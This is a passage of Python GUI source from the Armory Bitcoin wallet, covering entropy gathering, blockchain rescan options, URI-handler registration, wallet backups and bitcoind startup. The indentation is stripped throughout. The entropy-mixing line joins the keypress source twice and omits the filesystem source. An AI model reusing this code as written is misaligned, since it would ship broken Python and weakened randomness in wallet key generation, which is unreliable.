# be constant while typing. Either way, even, if they change no text
# and use a 5-char password, we will still pickup about 40 events.
# Then we throw in the [name,time,size] triplets of some volatile
# system directories, and the hash of a file in that directory that
# is expected to have timestamps and system-dependent parameters.
# Finally, take a desktop screenshot...
# All three of these source are likely to have sufficient entropy alone.
source1,self.entropyAccum = self.entropyAccum,[]
if len(source1)==0:
LOGERROR('Error getting extra entropy from mouse & key presses')
source2 = []
try:
if OS_WINDOWS:
tempDir = os.getenv('TEMP')
extraFiles = []
elif OS_LINUX:
tempDir = '/var/log'
extraFiles = ['/var/log/Xorg.0.log']
elif OS_MACOSX:
tempDir = '/var/log'
extraFiles = ['/var/log/system.log']
# A simple listing of the directory files, sizes and times is good
if os.path.exists(tempDir):
for fname in os.listdir(tempDir):
fullpath = os.path.join(tempDir, fname)
sz = os.path.getsize(fullpath)
tm = os.path.getmtime(fullpath)
source2.append([fname, sz, tm])
# On Linux we also throw in Xorg.0.log
for f in extraFiles:
if os.path.exists(f):
with open(f,'rb') as infile:
source2.append(hash256(infile.read()))
if len(source2)==0:
LOGWARN('Second source of supplemental entropy will be empty')
except:
LOGEXCEPT('Error getting extra entropy from filesystem')
source3 = ''
try:
pixDesk = QPixmap.grabWindow(QApplication.desktop().winId())
pixRaw = QByteArray()
pixBuf = QBuffer(pixRaw)
pixBuf.open(QIODevice.WriteOnly)
pixDesk.save(pixBuf, 'PNG')
source3 = pixBuf.buffer().toHex()
except:
LOGEXCEPT('Third source of entropy (desktop screenshot) failed')
if len(source3)==0:
LOGWARN('Error getting extra entropy from screenshot')
LOGINFO('Adding %d keypress events to the entropy pool', len(source1)/3)
LOGINFO('Adding %s bytes of filesystem data to the entropy pool',
bytesToHumanSize(len(str(source2))))
LOGINFO('Adding %s bytes from desktop screenshot to the entropy pool',
bytesToHumanSize(len(str(source3))/2))
allEntropy = ''.join([str(a) for a in [source1, source1, source3]])
return SecureBinaryData(HMAC256('Armory Entropy', allEntropy))
####################################################
def rescanNextLoad(self):
reply = QMessageBox.warning(self, self.tr('Queue Rescan?'), self.tr(
'The next time you restart Armory, it will rescan the blockchain '
'database, and reconstruct your wallet histories from scratch. '
'The rescan will take 10-60 minutes depending on your system. '
'<br><br> '
'Do you wish to force a rescan on the next Armory restart?'), \
QMessageBox.Yes | QMessageBox.No)
if reply==QMessageBox.Yes:
touchFile( os.path.join(ARMORY_HOME_DIR, 'rescan.flag') )
####################################################
def rebuildNextLoad(self):
reply = QMessageBox.warning(self, self.tr('Queue Rebuild?'), self.tr(
'The next time you restart Armory, it will rebuild and rescan '
'the entire blockchain database. This operation can take between '
'30 minutes and 4 hours depending on your system speed. '
'<br><br>'
'Do you wish to force a rebuild on the next Armory restart?'), \
QMessageBox.Yes | QMessageBox.No)
if reply==QMessageBox.Yes:
touchFile( os.path.join(ARMORY_HOME_DIR, 'rebuild.flag') )
####################################################
def rescanBalanceNextLoad(self):
reply = QMessageBox.warning(self, self.tr('Queue Balance Rescan?'), self.tr(
'The next time you restart Armory, it will rescan the balance of '
'your wallets. This operation typically takes less than a minute. '
'<br><br>'
'Do you wish to force a balance rescan on the next Armory restart?'), \
QMessageBox.Yes | QMessageBox.No)
if reply==QMessageBox.Yes:
touchFile( os.path.join(ARMORY_HOME_DIR, 'rescanbalance.flag') )
####################################################
def loadFailedManyTimesFunc(self, nFail):
"""
For now, if the user is having trouble loading the blockchain, all
we do is delete mempool.bin (which is frequently corrupted but not
detected as such. However, we may expand this in the future, if
it's determined that more-complicated things are necessary.
"""
LOGERROR('%d attempts to load blockchain failed. Remove mempool.bin.' % nFail)
mempoolfile = os.path.join(ARMORY_HOME_DIR,'mempool.bin')
if os.path.exists(mempoolfile):
os.remove(mempoolfile)
else:
LOGERROR('File mempool.bin does not exist. Nothing deleted.')
####################################################
def menuSelectImportKey(self):
QMessageBox.information(self, self.tr('Select Wallet'), self.tr(
'You must import an address into a specific wallet. If '
'you do not want to import the key into any available wallet, '
'it is recommeneded you make a new wallet for this purpose.'
'<br><br>'
'Double-click on the desired wallet from the main window, then '
'click on "Import/Sweep Private Keys" on the bottom-right '
'of the properties window.'
'<br><br>'
'Keys cannot be imported into watching-only wallets, only full '
'wallets.'), QMessageBox.Ok)
####################################################
def menuSelectSweepKey(self):
QMessageBox.information(self, self.tr('Select Wallet'), self.tr(
'You must select a wallet into which funds will be swept. '
'Double-click on the desired wallet from the main window, then '
'click on "Import/Sweep Private Keys" on the bottom-right '
'of the properties window to sweep to that wallet.'
'<br><br>'
'Keys cannot be swept into watching-only wallets, only full '
'wallets.'), QMessageBox.Ok)
####################################################
def changeNumShow(self):
prefWidth = self.numShowOpts[self.comboNumShow.currentIndex()]
if prefWidth=='All':
self.currLedgMin = 1;
self.currLedgMax = self.ledgerSize
self.currLedgWidth = -1;
else:
self.currLedgMax = self.currLedgMin + prefWidth - 1
self.currLedgWidth = prefWidth
self.applyLedgerRange()
####################################################
def clickLedgUp(self):
self.currLedgMin -= self.currLedgWidth
self.currLedgMax -= self.currLedgWidth
self.applyLedgerRange()
####################################################
def clickLedgDn(self):
self.currLedgMin += self.currLedgWidth
self.currLedgMax += self.currLedgWidth
self.applyLedgerRange()
####################################################
def applyLedgerRange(self):
if self.currLedgMin < 1:
toAdd = 1 - self.currLedgMin
self.currLedgMin += toAdd
self.currLedgMax += toAdd
if self.currLedgMax > self.ledgerSize:
toSub = self.currLedgMax - self.ledgerSize
self.currLedgMin -= toSub
self.currLedgMax -= toSub
self.currLedgMin = max(self.currLedgMin, 1)
self.btnLedgUp.setVisible(self.currLedgMin!=1)
self.btnLedgDn.setVisible(self.currLedgMax!=self.ledgerSize)
self.createCombinedLedger()
####################################################
def openSettings(self):
LOGDEBUG('openSettings')
dlgSettings = DlgSettings(self, self)
dlgSettings.exec_()
####################################################
def setupSystemTray(self):
LOGDEBUG('setupSystemTray')
# Creating a QSystemTray
self.sysTray = QSystemTrayIcon(self)
self.sysTray.setIcon( QIcon(self.iconfile) )
self.sysTray.setVisible(True)
self.sysTray.setToolTip('Armory' + (' [Testnet]' if USE_TESTNET else '') + (' [Regtest]' if USE_REGTEST else ''))
self.connect(self.sysTray, SIGNAL('messageClicked()'), self.bringArmoryToFront)
self.connect(self.sysTray, SIGNAL('activated(QSystemTrayIcon::ActivationReason)'), \
self.sysTrayActivated)
menu = QMenu(self)
def traySend():
self.bringArmoryToFront()
self.clickSendBitcoins()
def trayRecv():
self.bringArmoryToFront()
self.clickReceiveCoins()
actShowArmory = self.createAction(self.tr('Show Armory'), self.bringArmoryToFront)
actSendBtc = self.createAction(self.tr('Send Bitcoins'), traySend)
actRcvBtc = self.createAction(self.tr('Receive Bitcoins'), trayRecv)
actClose = self.createAction(self.tr('Quit Armory'), self.closeForReal)
# Create a short menu of options
menu.addAction(actShowArmory)
menu.addAction(actSendBtc)
menu.addAction(actRcvBtc)
menu.addSeparator()
menu.addAction(actClose)
self.sysTray.setContextMenu(menu)
self.notifyQueue = []
self.notifyBlockedUntil = 0
#############################################################################
@AllowAsync
def registerBitcoinWithFF(self):
#the 3 nodes needed to add to register bitcoin as a protocol in FF
rdfschemehandler = 'about=\"urn:scheme:handler:bitcoin\"'
rdfscheme = 'about=\"urn:scheme:bitcoin\"'
rdfexternalApp = 'about=\"urn:scheme:externalApplication:bitcoin\"'
#find mimeTypes.rdf file
rdfs_found = glob.glob(
os.path.join(
os.path.expanduser("~"),
".mozilla",
"firefox",
"*",
"mimeTypes.rdf"
)
)
for rdfs in rdfs_found:
if rdfs:
try:
FFrdf = open(rdfs, 'r+')
except IOError:
continue
ct = FFrdf.readlines()
rdfsch=-1
rdfsc=-1
rdfea=-1
i=0
#look for the nodes
for line in ct:
if rdfschemehandler in line:
rdfsch=i
elif rdfscheme in line:
rdfsc=i
elif rdfexternalApp in line:
rdfea=i
i+=1
#seek to end of file
FFrdf.seek(-11, 2)
i=0;
#add the missing nodes
if rdfsch == -1:
FFrdf.write(' <RDF:Description RDF:about=\"urn:scheme:handler:bitcoin\"\n')
FFrdf.write(' NC:alwaysAsk=\"false\">\n')
FFrdf.write(' <NC:externalApplication RDF:resource=\"urn:scheme:externalApplication:bitcoin\"/>\n')
FFrdf.write(' <NC:possibleApplication RDF:resource=\"urn:handler:local:/usr/bin/xdg-open\"/>\n')
FFrdf.write(' </RDF:Description>\n')
i+=1
if rdfsc == -1:
FFrdf.write(' <RDF:Description RDF:about=\"urn:scheme:bitcoin\"\n')
FFrdf.write(' NC:value=\"bitcoin\">\n')
FFrdf.write(' <NC:handlerProp RDF:resource=\"urn:scheme:handler:bitcoin\"/>\n')
FFrdf.write(' </RDF:Description>\n')
i+=1
if rdfea == -1:
FFrdf.write(' <RDF:Description RDF:about=\"urn:scheme:externalApplication:bitcoin\"\n')
FFrdf.write(' NC:prettyName=\"xdg-open\"\n')
FFrdf.write(' NC:path=\"/usr/bin/xdg-open\" />\n')
i+=1
if i != 0:
FFrdf.write('</RDF:RDF>\n')
FFrdf.close()
#############################################################################
def setupUriRegistration(self, justDoIt=False):
"""
Setup Armory as the default application for handling bitcoin: links
"""
LOGINFO('setupUriRegistration')
if USE_TESTNET or USE_REGTEST:
return
if OS_LINUX:
out,err = execAndWait('gconftool-2 --get /desktop/gnome/url-handlers/bitcoin/command')
out2,err = execAndWait('xdg-mime query default x-scheme-handler/bitcoin')
#check FF protocol association
#checkFF_thread = threading.Thread(target=self.registerBitcoinWithFF)
#checkFF_thread.start()
self.registerBitcoinWithFF(async=True)
def setAsDefault():
LOGINFO('Setting up Armory as default URI handler...')
execAndWait('gconftool-2 -t string -s /desktop/gnome/url-handlers/bitcoin/command "python2 %s \"%%s\""' % __file__)
execAndWait('gconftool-2 -s /desktop/gnome/url-handlers/bitcoin/needs_terminal false -t bool')
execAndWait('gconftool-2 -t bool -s /desktop/gnome/url-handlers/bitcoin/enabled true')
execAndWait('xdg-mime default armory.desktop x-scheme-handler/bitcoin')
if ('no value' in out.lower() or 'no value' in err.lower()) and not 'armory.desktop' in out2.lower():
# Silently add Armory if it's never been set before
setAsDefault()
elif (not 'armory' in out.lower() or not 'armory.desktop' in out2.lower()) and not self.firstLoad:
# If another application has it, ask for permission to change it
# Don't bother the user on the first load with it if verification is
# needed. They have enough to worry about with this weird new program...
if not self.getSettingOrSetDefault('DNAA_DefaultApp', False):
reply = MsgBoxWithDNAA(self, self, MSGBOX.Question, self.tr('Default URL Handler'),
self.tr('Armory is not set as your default application for handling '
'"bitcoin:" links. Would you like to use Armory as the '
'default?'), self.tr('Do not ask this question again'))
if reply[0]==True:
setAsDefault()
if reply[1]==True:
self.writeSetting('DNAA_DefaultApp', True)
elif OS_WINDOWS:
# Check for existing registration (user first, then root, if necessary)
action = 'DoNothing'
modulepathname = '"'
if getattr(sys, 'frozen', False):
app_dir = os.path.dirname(sys.executable)
app_path = os.path.join(app_dir, sys.executable)
elif __file__:
return #running from a .py script, not gonna register URI on Windows
#justDoIt = True
import ctypes
GetModuleFileNameW = ctypes.windll.kernel32.GetModuleFileNameW
GetModuleFileNameW.restype = ctypes.c_int
app_path = ctypes.create_string_buffer(1024)
rtlength = ctypes.c_int()
rtlength = GetModuleFileNameW(None, ctypes.byref(app_path), 1024)
passstr = str(app_path.raw)
modulepathname += unicode(passstr[0:(rtlength*2)], encoding='utf16') + u'" "%1"'
modulepathname = modulepathname.encode('utf8')
rootKey = 'bitcoin\\shell\\open\\command'
try:
userKey = 'Software\\Classes\\' + rootKey
registryKey = OpenKey(HKEY_CURRENT_USER, userKey, 0, KEY_READ)
val,code = QueryValueEx(registryKey, '')
if 'armory' in val.lower():
if val.lower()==modulepathname.lower():
LOGINFO('Armory already registered for current user. Done!')
return
else:
action = 'DoIt' #armory is registered, but to another path
else:
# Already set to something (at least created, which is enough)
action = 'AskUser'
except:
# No user-key set, check if root-key is set
try:
registryKey = OpenKey(HKEY_CLASSES_ROOT, rootKey, 0, KEY_READ)
val,code = QueryValueEx(registryKey, '')
if 'armory' in val.lower():
LOGINFO('Armory already registered at admin level. Done!')
return
else:
# Root key is set (or at least created, which is enough)
action = 'AskUser'
except:
action = 'DoIt'
dontAsk = self.getSettingOrSetDefault('DNAA_DefaultApp', False)
dontAskDefault = self.getSettingOrSetDefault('AlwaysArmoryURI', False)
if justDoIt:
LOGINFO('URL-register: just doing it')
action = 'DoIt'
elif dontAsk and dontAskDefault:
LOGINFO('URL-register: user wants to do it by default')
action = 'DoIt'
elif action=='AskUser' and not self.firstLoad and not dontAsk:
# If another application has it, ask for permission to change it
# Don't bother the user on the first load with it if verification is
# needed. They have enough to worry about with this weird new program...
reply = MsgBoxWithDNAA(self, self, MSGBOX.Question, self.tr('Default URL Handler'),
self.tr('Armory is not set as your default application for handling '
'"bitcoin:" links. Would you like to use Armory as the '
'default?'), self.tr('Do not ask this question again'))
if reply[1]==True:
LOGINFO('URL-register: do not ask again: always %s', str(reply[0]))
self.writeSetting('DNAA_DefaultApp', True)
self.writeSetting('AlwaysArmoryURI', reply[0])
if reply[0]==True:
action = 'DoIt'
else:
LOGINFO('User requested not to use Armory as URI handler')
return
# Finally, do it if we're supposed to!
LOGINFO('URL-register action: %s', action)
if action=='DoIt':
LOGINFO('Registering Armory for current user')
baseDir = os.path.dirname(unicode(passstr[0:(rtlength*2)], encoding='utf16'))
regKeys = []
regKeys.append(['Software\\Classes\\bitcoin', '', 'URL:bitcoin Protocol'])
regKeys.append(['Software\\Classes\\bitcoin', 'URL Protocol', ""])
regKeys.append(['Software\\Classes\\bitcoin\\shell', '', None])
regKeys.append(['Software\\Classes\\bitcoin\\shell\\open', '', None])
for key,name,val in regKeys:
dkey = '%s\\%s' % (key,name)
LOGINFO('\tWriting key: [HKEY_CURRENT_USER\\] ' + dkey)
registryKey = CreateKey(HKEY_CURRENT_USER, key)
SetValueEx(registryKey, name, 0, REG_SZ, val)
CloseKey(registryKey)
regKeysU = []
regKeysU.append(['Software\\Classes\\bitcoin\\shell\\open\\command', '', \
modulepathname])
regKeysU.append(['Software\\Classes\\bitcoin\\DefaultIcon', '', \
'"%s\\armory48x48.ico"' % baseDir])
for key,name,val in regKeysU:
dkey = '%s\\%s' % (key,name)
LOGINFO('\tWriting key: [HKEY_CURRENT_USER\\] ' + dkey)
registryKey = CreateKey(HKEY_CURRENT_USER, key)
#hKey = ctypes.c_int(registryKey.handle)
#ctypes.windll.Advapi32.RegSetValueEx(hKey, None, 0, REG_SZ, val, (len(val)+1))
SetValueEx(registryKey, name, 0, REG_SZ, val)
CloseKey(registryKey)
#############################################################################
def warnNewUSTXFormat(self):
if not self.getSettingOrSetDefault('DNAA_Version092Warn', False):
reply = MsgBoxWithDNAA(self, self, MSGBOX.Warning, self.tr("Version Warning"), self.tr(
'Since Armory version 0.92 the formats for offline transaction '
'operations has changed to accommodate multi-signature '
'transactions. This format is <u>not</u> compatible with '
'versions of Armory before 0.92. '
'<br><br>'
'To continue, the other system will need to be upgraded to '
'to version 0.92 or later. If you cannot upgrade the other '
'system, you will need to reinstall an older version of Armory '
'on this system.'), dnaaMsg=self.tr('Do not show this warning again'))
self.writeSetting('DNAA_Version092Warn', reply[1])
#############################################################################
def execOfflineTx(self):
self.warnNewUSTXFormat()
dlgSelect = DlgOfflineSelect(self, self)
if dlgSelect.exec_():
# If we got here, one of three buttons was clicked.
if dlgSelect.do_create:
DlgSendBitcoins(self.getSelectedWallet(), self, self,
onlyOfflineWallets=True).exec_()
elif dlgSelect.do_broadc:
DlgSignBroadcastOfflineTx(self,self).exec_()
#############################################################################
def sizeHint(self):
return QSize(1000, 650)
#############################################################################
def openToolsDlg(self):
QMessageBox.information(self, self.tr('No Tools Yet!'),
self.tr('The developer tools are not available yet, but will be added '
'soon. Regardless, developer-mode still offers lots of '
'extra information and functionality that is not available in '
'Standard or Advanced mode.'), QMessageBox.Ok)
#############################################################################
def execIntroDialog(self):
if not self.getSettingOrSetDefault('DNAA_IntroDialog', False):
dlg = DlgIntroMessage(self, self)
result = dlg.exec_()
if dlg.chkDnaaIntroDlg.isChecked():
self.writeSetting('DNAA_IntroDialog', True)
if dlg.requestCreate:
self.startWalletWizard()
if dlg.requestImport:
self.execImportWallet()
#############################################################################
def makeWalletCopy(self, parent, wlt, copyType='Same', suffix='', changePass=False):
'''Create a digital backup of your wallet.'''
if changePass:
LOGERROR('Changing password is not implemented yet!')
raise NotImplementedError
# Set the file name.
export_rootpubkey = False
if copyType.lower()=='pkcc':
fn = 'armory_%s.%s' % (wlt.uniqueIDB58, suffix)
export_rootpubkey = True
else:
fn = 'armory_%s_%s.wallet' % (wlt.uniqueIDB58, suffix)
if wlt.watchingOnly and copyType.lower() != 'pkcc':
fn = 'armory_%s_%s_WatchOnly.wallet' % (wlt.uniqueIDB58, suffix)
if export_rootpubkey is True:
savePath = unicode(self.getFileSave(defaultFilename=fn,
ffilter=['Root Pubkey Text Files (*.rootpubkey)']))
else:
savePath = unicode(self.getFileSave(defaultFilename=fn))
if not len(savePath) > 0:
return False
# Create the file based on the type you want.
if copyType.lower()=='same':
wlt.writeFreshWalletFile(savePath)
elif copyType.lower()=='decrypt':
if wlt.useEncryption:
dlg = DlgUnlockWallet(wlt, parent, self, 'Unlock Private Keys')
if not dlg.exec_():
return False
# Wallet should now be unlocked
wlt.makeUnencryptedWalletCopy(savePath)
elif copyType.lower()=='encrypt':
newPassphrase=None
if not wlt.useEncryption:
dlgCrypt = DlgChangePassphrase(parent, self, not wlt.useEncryption)
if not dlgCrypt.exec_():
QMessageBox.information(parent, self.tr('Aborted'), self.tr(
'No passphrase was selected for the encrypted backup. '
'No backup was created.'), QMessageBox.Ok)
newPassphrase = SecureBinaryData(str(dlgCrypt.edtPasswd1.text()))
wlt.makeEncryptedWalletCopy(savePath, newPassphrase)
elif copyType.lower() == 'pkcc':
wlt.writePKCCFile(savePath)
else:
LOGERROR('Invalid "copyType" supplied to makeWalletCopy: %s', copyType)
return False
QMessageBox.information(parent, self.tr('Backup Complete'), self.tr(
'Your wallet was successfully backed up to the following '
'location:<br><br>%1').arg(savePath), QMessageBox.Ok)
return True
#############################################################################
def createAction(self, txt, slot, isCheckable=False, \
ttip=None, iconpath=None, shortcut=None):
"""
Modeled from the "Rapid GUI Programming with Python and Qt" book, page 174
"""
icon = QIcon()
if iconpath:
icon = QIcon(iconpath)
theAction = QAction(icon, txt, self)
if isCheckable:
theAction.setCheckable(True)
self.connect(theAction, SIGNAL('toggled(bool)'), slot)
else:
self.connect(theAction, SIGNAL('triggered()'), slot)
if ttip:
theAction.setToolTip(ttip)
theAction.setStatusTip(ttip)
if shortcut:
theAction.setShortcut(shortcut)
return theAction
#############################################################################
def setUserMode(self, mode):
LOGINFO('Changing usermode:')
LOGINFO(' From: %s', self.settings.get('User_Mode'))
self.usermode = mode
if mode==USERMODE.Standard:
self.writeSetting('User_Mode', 'Standard')
if mode==USERMODE.Advanced:
self.writeSetting('User_Mode', 'Advanced')
if mode==USERMODE.Expert:
self.writeSetting('User_Mode', 'Expert')
LOGINFO(' To: %s', self.settings.get('User_Mode'))
if not self.firstModeSwitch:
QMessageBox.information(self,self.tr('Restart Armory'),
self.tr('You may have to restart Armory for all aspects of '
'the new usermode to go into effect.'), QMessageBox.Ok)
self.firstModeSwitch = False
#############################################################################
def setLang(self, lang):
LOGINFO('Changing language:')
LOGINFO(' From: %s', self.settings.get('Language'))
self.language = lang
self.writeSetting("Language", lang)
LOGINFO(' To: %s', self.settings.get('Language'))
if not self.firstModeSwitch:
QMessageBox.information(self, self.tr('Restart Armory'),
self.tr('You will have to restart Armory for the new language to go into effect'), QMessageBox.Ok)
self.firstModeSwitch = False
#############################################################################
def getPreferredDateFormat(self):
# Treat the format as "binary" to make sure any special symbols don't
# interfere with the SettingsFile symbols
globalDefault = binary_to_hex(DEFAULT_DATE_FORMAT)
fmt = self.getSettingOrSetDefault('DateFormat', globalDefault)
return hex_to_binary(str(fmt)) # short hex strings could look like int()
#############################################################################
def setPreferredDateFormat(self, fmtStr):
# Treat the format as "binary" to make sure any special symbols don't
# interfere with the SettingsFile symbols
try:
unixTimeToFormatStr(1000000000, fmtStr)
except:
QMessageBox.warning(self, self.tr('Invalid Date Format'),
self.tr('The date format you specified was not valid. Please re-enter '
'it using only the strftime symbols shown in the help text.'), QMessageBox.Ok)
return False
self.writeSetting('DateFormat', binary_to_hex(fmtStr))
return True
#############################################################################
def triggerProcessMutexNotification(self, uriLink):
self.bringArmoryToFront()
uriDict = parseBitcoinURI(uriLink)
if len(uriDict) > 0:
self.uriLinkClicked(uriLink)
#############################################################################
def acquireProcessMutex(self):
LOGINFO('acquiring process mutex...')
self.connect(self, SIGNAL("processMutexNotification"), \
self.triggerProcessMutexNotification)
# Prevent Armory from being opened twice
def uriClick_partial(a):
self.emit(SIGNAL("processMutexNotification"), a)
if CLI_OPTIONS.interport > 1:
from armoryengine.ProcessMutex import PySide_ProcessMutex
self.prc_mutex = PySide_ProcessMutex(CLI_OPTIONS.interport, uriClick_partial)
if self.prc_mutex.acquire() == False:
LOGWARN('Socket already occupied! This must be a duplicate Armory')
QMessageBox.warning(self, self.tr('Already Open'), self.tr(
'Armory is already running! You can only have one Armory open '
'at a time. Exiting...'), QMessageBox.Ok)
os._exit(0)
else:
LOGWARN('*** Listening port is disabled. URI-handling will not work')
self.internetStatus = INTERNET_STATUS.DidNotCheck
############################################################################
def startArmoryDBIfNecessary(self):
if CLI_OPTIONS.offline:
LOGWARN("Offline instance, not startig the DB")
return False
try:
if TheBDM.hasRemoteDB() == False:
#check there is no local db
localDBPort = Cpp.BlockDataManagerConfig_hasLocalDB(\
str(ARMORY_HOME_DIR), armoryengine.ArmoryUtils.ARMORYDB_PORT)
if len(localDBPort) > 0:
armoryengine.ArmoryUtils.ARMORYDB_PORT = localDBPort
return True
#look for cookie file and delete it
cookiePath = os.path.join(ARMORY_HOME_DIR, ".cookie_")
if os.path.exists(cookiePath):
os.remove(cookiePath)
#If we got this far, we need to spawn a local db
self.setSatoshiPaths()
TheSDM.spawnDB(str(ARMORY_HOME_DIR), TheBDM.armoryDBDir)
#wait for cookie file creation
while not os.path.exists(cookiePath):
time.sleep(0.1)
#get port from cookie
armoryengine.ArmoryUtils.ARMORYDB_PORT = \
Cpp.BlockDataManagerConfig_getPortFromCookie(str(ARMORY_HOME_DIR))
#test if db has started
if Cpp.BlockDataManagerConfig_testConnection(\
ARMORYDB_IP, armoryengine.ArmoryUtils.ARMORYDB_PORT) == False:
LOGERROR("Failed to spawn ArmoryDB")
return False
LOGINFO("Connecting on port %s" % armoryengine.ArmoryUtils.ARMORYDB_PORT)
else:
LOGWARN("DB is already running")
return True
except Exception as e:
LOGEXCEPT('Failed to start Armory database: %s' % str(e))
return False
############################################################################
def startBitcoindIfNecessary(self):
LOGINFO('startBitcoindIfNecessary')
TheSDM.checkDBIsLocal()
if self.internetStatus == INTERNET_STATUS.Unavailable or \
CLI_OPTIONS.offline:
LOGWARN('Not online, will not start bitcoind')
return False
if TheBDM.hasRemoteDB() or not self.doAutoBitcoind:
return False
if TheSDM.satoshiIsAvailable():
LOGWARN('Tried to start bitcoind, but satoshi already running')
return False
self.setSatoshiPaths()
try:
# "satexe" is actually just the install directory, not the direct
# path the executable. That dir tree will be searched for bitcoind
TheSDM.setupSDM(extraExeSearch=self.satoshiExeSearchPath)
TheSDM.startBitcoind()
LOGDEBUG('Bitcoind started without error')
return True
except:
LOGEXCEPT('Failed to setup SDM')
self.switchNetworkMode(NETWORKMODE.Offline)
############################################################################
def notifyBitcoindIsReady(self):
self.signalExecution.executeMethod(\
self.completeBlockchainProcessingInitialization)
############################################################################
def setSatoshiPaths(self):
LOGINFO('setSatoshiPaths')
# We skip the getSettingOrSetDefault call, because we don't want to set
# it if it doesn't exist
if self.settings.hasSetting('SatoshiExe'):
if not os.path.exists(self.settings.get('SatoshiExe')):
LOGERROR('Bitcoin installation setting is a non-existent directory')
self.satoshiExeSearchPath = [self.settings.get('SatoshiExe')]
else:
self.satoshiExeSearchPath = []
self.satoshiHomePath = BTC_HOME_DIR
if self.settings.hasSetting('SatoshiDatadir'):
# Setting override BTC_HOME_DIR only if it wasn't explicitly
# set as the command line.
manageSatoshi = self.settings.get('ManageSatoshi')
if manageSatoshi == True:
self.satoshiHomePath = str(self.settings.get('SatoshiDatadir'))
LOGINFO('Setting satoshi datadir = %s' % self.satoshiHomePath)
TheBDM.setSatoshiDir(self.satoshiHomePath)
TheSDM.setSatoshiDir(self.satoshiHomePath)
############################################################################
# This version of online mode is possible doesn't check the internet everytime
def isOnlineModePossible(self):
return self.internetStatus != INTERNET_STATUS.Unavailable and \
TheSDM.satoshiIsAvailable() and \
os.path.exists(os.path.join(TheBDM.btcdir, 'blocks'))
############################################################################
def loadBlockchainIfNecessary(self):
LOGINFO('loadBlockchainIfNecessary')
if self.netMode != NETWORKMODE.Offline:
# Track number of times we start loading the blockchain.
# We will decrement the number when loading finishes
# We can use this to detect problems with mempool or blkxxxx.dat
self.numTriesOpen = self.getSettingOrSetDefault('FailedLoadCount', 0)
if self.numTriesOpen>2:
self.loadFailedManyTimesFunc(self.numTriesOpen)
self.settings.set('FailedLoadCount', self.numTriesOpen+1)
try:
TheBDM.goOnline()
self.switchNetworkMode(NETWORKMODE.Full)
except Cpp.NoArmoryDBExcept:
self.switchNetworkMode(NETWORKMODE.Offline)
#############################################################################
def switchNetworkMode(self, newMode):
LOGINFO('Setting netmode: %s', newMode)
self.netMode=newMode
return
#############################################################################
def parseUriLink(self, uriStr, click=True):
if len(uriStr) < 1:
QMessageBox.critical(self, self.tr('No URL String'),
self.tr('You have not entered a URL String yet. '
'Please go back and enter a URL String.'), QMessageBox.Ok)
return {}
LOGINFO('URI link clicked!')
LOGINFO('The following URI string was parsed:')
LOGINFO(uriStr.replace('%','%%'))
try:
uriDict = parseBitcoinURI(uriStr)
except:
# malformed uri, make the dict empty, which will trigger the warning
uriDict = {}
if TheBDM.getState() in (BDM_OFFLINE,BDM_UNINITIALIZED):
LOGERROR('Clicked or entered "bitcoin:" link in offline mode.')
self.bringArmoryToFront()
if click:
QMessageBox.warning(self, self.tr('Offline Mode'),
self.tr('You clicked on a "bitcoin:" link, but Armory is in '
'offline mode, and is not capable of creating transactions. '
'Using links will only work if Armory is connected '
'to the Bitcoin network!'), QMessageBox.Ok)
else:
QMessageBox.warning(self, self.tr('Offline Mode'),
self.tr('You entered a "bitcoin:" link, but Armory is in '
'offline mode, and is not capable of creating transactions. '
'Using links will only work if Armory is connected '
'to the Bitcoin network!'), QMessageBox.Ok)
return {}
if len(uriDict)==0:
if click:
warnMsg = (self.tr('It looks like you just clicked a "bitcoin:" link, but that link is malformed.'))
else:
warnMsg = (self.tr('It looks like you just entered a "bitcoin:" link, but that link is malformed.'))
if self.usermode == USERMODE.Standard:
warnMsg += (self.tr('Please check the source of the link and enter the transaction manually.'))
else:
warnMsg += self.tr('The raw URI string is:\n\n') + uriStr
QMessageBox.warning(self, self.tr('Invalid URI'), warnMsg, QMessageBox.Ok)
LOGERROR(warnMsg.replace('\n', ' '))
return {}
if not uriDict.has_key('address'):
if click:
QMessageBox.warning(self, self.tr('The "bitcoin:" link you just clicked '
'does not even contain an address! There is nothing that '
'Armory can do with this link!'), QMessageBox.Ok)
else:
QMessageBox.warning(self, self.tr('The "bitcoin:" link you just entered '
'does not even contain an address! There is nothing that '
'Armory can do with this link!'), QMessageBox.Ok)
LOGERROR('No address in "bitcoin:" link! Nothing to do!')
return {}
# Verify the URI is for the same network as this Armory instnance
theAddrByte = checkAddrType(base58_to_binary(uriDict['address']))
if theAddrByte!=-1 and not theAddrByte in [ADDRBYTE, P2SHBYTE]:
net = 'Unknown Network'
if NETWORKS.has_key(theAddrByte):
net = NETWORKS[theAddrByte]
if click:
QMessageBox.warning(self, self.tr('Wrong Network!'),
self.tr('The address for the "bitcoin:" link you just clicked is '
'for the wrong network! You are on the <b>%2</b> '
'and the address you supplied is for the '
'<b>%3</b>!').arg(NETWORKS[ADDRBYTE], net), QMessageBox.Ok)
else:
QMessageBox.warning(self, self.tr('Wrong Network!'),
self.tr('The address for the "bitcoin:" link you just entered is '
'for the wrong network! You are on the <b>%2</b> '
'and the address you supplied is for the '
'<b>%3</b>!').arg(NETWORKS[ADDRBYTE], net), QMessageBox.Ok)
LOGERROR('URI link is for the wrong network!')
return {}
# If the URI contains "req-" strings we don't recognize, throw error
recognized = ['address','version','amount','label','message']
for key,value in uriDict.iteritems():
if key.startswith('req-') and not key[4:] in recognized:
if click:
QMessageBox.warning(self, self.tr('Unsupported URI'), self.tr('The "bitcoin:" link '
'you just clicked contains fields that are required but not '
'recognized by Armory. This may be an older version of Armory, '
'or the link you clicked on uses an exotic, unsupported format. '
'<br><br>The action cannot be completed.'''), QMessageBox.Ok)
else:
QMessageBox.warning(self, self.tr('Unsupported URI'), self.tr('The "bitcoin:" link '
'you just entered contains fields that are required but not '
'recognized by Armory. This may be an older version of Armory, '
'or the link you entered on uses an exotic, unsupported format. '
'<br><br>The action cannot be completed.'), QMessageBox.Ok)
LOGERROR('URI link contains unrecognized req- fields.')
return {}
return uriDict
#############################################################################
def uriLinkClicked(self, uriStr):
LOGINFO('uriLinkClicked')
if TheBDM.getState()==BDM_OFFLINE:
QMessageBox.warning(self, self.tr('Offline'),
self.tr('You just clicked on a "bitcoin:" link, but Armory is offline '
'and cannot send transactions. Please click the link '
'again when Armory is online.'), \
QMessageBox.Ok)
return
elif not TheBDM.getState()==BDM_BLOCKCHAIN_READY:
# BDM isnt ready yet, saved URI strings in the delayed URIDict to
# call later through finishLoadBlockChainGUI
qLen = self.delayedURIData['qLen']
self.delayedURIData[qLen] = uriStr
qLen = qLen +1
self.delayedURIData['qLen'] = qLen
return
